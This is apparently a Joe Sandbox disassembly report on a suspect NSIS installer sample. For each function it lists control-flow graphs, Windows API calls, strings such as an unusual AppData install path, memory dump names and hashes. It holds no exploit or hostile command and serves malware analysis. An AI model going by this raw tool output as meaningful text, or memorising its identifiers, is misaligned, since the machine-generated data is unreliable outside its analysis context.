                                                                                            control_flow_graph 563 40176f-401794 call 402c41 call 405be3 568 401796-40179c call 406297 563->568 569 40179e-4017b0 call 406297 call 405b6c lstrcatW 563->569 574 4017b5-4017b6 call 40652b 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065da 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 582 4017f7-4017f8 call 405d68 580->582 583 4017fd-401819 call 405d8d 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 4052ff call 403116 583->591 587->580 588->587 593 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 590->593 594 40186f-401879 call 4052ff 590->594 605 4018b8-4018bc 591->605 606 4018be-4018ca SetFileTime 591->606 593->578 626 401864-401865 593->626 603 401882-401888 594->603 607 402ace 603->607 605->606 609 4018d0-4018db CloseHandle 605->609 606->609 613 402ad0-402ad4 607->613 611 4018e1-4018e4 609->611 612 402ac5-402ac8 609->612 615 4018e6-4018f7 call 4062b9 lstrcatW 611->615 616 4018f9-4018fc call 4062b9 611->616 612->607 622 401901-4022fc call 4058fd 615->622 616->622 622->612 622->613 626->603 628 401867-401868 626->628 628->594
                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017B0
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017D5
                                                                                              • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                              • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                              • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp$C:\Users\user\AppData\Local\Temp\nsu4899.tmp$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 1941528284-417692713
                                                                                            • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                            • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                                            • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                            • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                                            Function 004052FF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 629 4052ff-405314 630 40531a-40532b 629->630 631 4053cb-4053cf 629->631 632 405336-405342 lstrlenW 630->632 633 40532d-405331 call 4062b9 630->633 635 405344-405354 lstrlenW 632->635 636 40535f-405363 632->636 633->632 635->631 637 405356-40535a lstrcatW 635->637 638 405372-405376 636->638 639 405365-40536c SetWindowTextW 636->639 637->636 640 405378-4053ba SendMessageW * 3 638->640 641 4053bc-4053be 638->641 639->638 640->641 641->631 642 4053c0-4053c3 641->642 642->631
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                            • lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                            • lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                            • SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID: halituses
                                                                                            • API String ID: 2531174081-2845610232
                                                                                            • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                            • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                            • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                            • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                                            Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 643 406601-406621 GetSystemDirectoryW 644 406623 643->644 645 406625-406627 643->645 644->645 646 406638-40663a 645->646 647 406629-406632 645->647 649 40663b-40666e wsprintfW LoadLibraryExW 646->649 647->646 648 406634-406636 647->648 648->649
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                            • wsprintfW.USER32 ref: 00406653
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-1946221925
                                                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                            • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                            • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                                            Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 650 403116-40312d 651 403136-40313f 650->651 652 40312f 650->652 653 403141 651->653 654 403148-40314d 651->654 652->651 653->654 655 40315d-40316a call 40330e 654->655 656 40314f-403158 call 403324 654->656 660 403170-403174 655->660 661 4032fc 655->661 656->655 662 4032a7-4032a9 660->662 663 40317a-4031a0 GetTickCount 660->663 664 4032fe-4032ff 661->664 665 4032e9-4032ec 662->665 666 4032ab-4032ae 662->666 667 403304 663->667 668 4031a6-4031ae 663->668 669 403307-40330b 664->669 670 4032f1-4032fa call 40330e 665->670 671 4032ee 665->671 666->667 672 4032b0 666->672 667->669 673 4031b0 668->673 674 4031b3-4031c1 call 40330e 668->674 670->661 683 403301 670->683 671->670 676 4032b3-4032b9 672->676 673->674 674->661 682 4031c7-4031d0 674->682 679 4032bb 676->679 680 4032bd-4032cb call 40330e 676->680 679->680 680->661 688 4032cd-4032d9 call 405e3f 680->688 685 4031d6-4031f6 call 4067d2 682->685 683->667 692 4031fc-40320f GetTickCount 685->692 693 40329f-4032a1 685->693 694 4032a3-4032a5 688->694 695 4032db-4032e5 688->695 696 403211-403219 692->696 697 40325a-40325c 692->697 693->664 694->664 695->676 698 4032e7 695->698 699 403221-403252 MulDiv wsprintfW call 4052ff 696->699 700 40321b-40321f 696->700 701 403293-403297 697->701 702 40325e-403262 697->702 698->667 708 403257 699->708 700->697 700->699 701->668 703 40329d 701->703 705 403264-40326b call 405e3f 702->705 706 403279-403284 702->706 703->667 711 403270-403272 705->711 707 403287-40328b 706->707 707->685 710 403291 707->710 708->697 710->667 711->694 712 403274-403277 711->712 712->707
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: ... %d%%
                                                                                            • API String ID: 551687249-2449383134
                                                                                            • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                            • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                                            • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                            • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9
                                                                                            Function 004057CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 713 4057ce-405819 CreateDirectoryW 714 40581b-40581d 713->714 715 40581f-40582c GetLastError 713->715 716 405846-405848 714->716 715->716 717 40582e-405842 SetFileSecurityW 715->717 717->714 718 405844 GetLastError 717->718 718->716
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                            • GetLastError.KERNEL32 ref: 00405825
                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                                            • GetLastError.KERNEL32 ref: 00405844
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 3449924974-3125694417
                                                                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                            • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                            • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                                            Function 00405DBC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 719 405dbc-405dc8 720 405dc9-405dfd GetTickCount GetTempFileNameW 719->720 721 405e0c-405e0e 720->721 722 405dff-405e01 720->722 724 405e06-405e09 721->724 722->720 723 405e03 722->723 723->724
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\You7ynHizy.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6), ref: 00405DF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-1909765820
                                                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                            • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                            • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                                            Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 729 402d44-402d6d call 406104 731 402d72-402d74 729->731 732 402d76-402d7c 731->732 733 402dec-402df0 731->733 734 402d98-402dad RegEnumKeyW 732->734 735 402d7e-402d80 734->735 736 402daf-402dc1 RegCloseKey call 406671 734->736 738 402dd0-402dde RegCloseKey 735->738 739 402d82-402d96 call 402d44 735->739 743 402de0-402de6 RegDeleteKeyW 736->743 744 402dc3-402dce 736->744 738->733 739->734 739->736 743->733 744->733
                                                                                            APIs
                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$Enum
                                                                                            • String ID:
                                                                                            • API String ID: 464197530-0
                                                                                            • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                            • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                                            • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                            • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                              • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,00000000,000000F0), ref: 0040164D
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00401640
                                                                                            Memory Dump Source
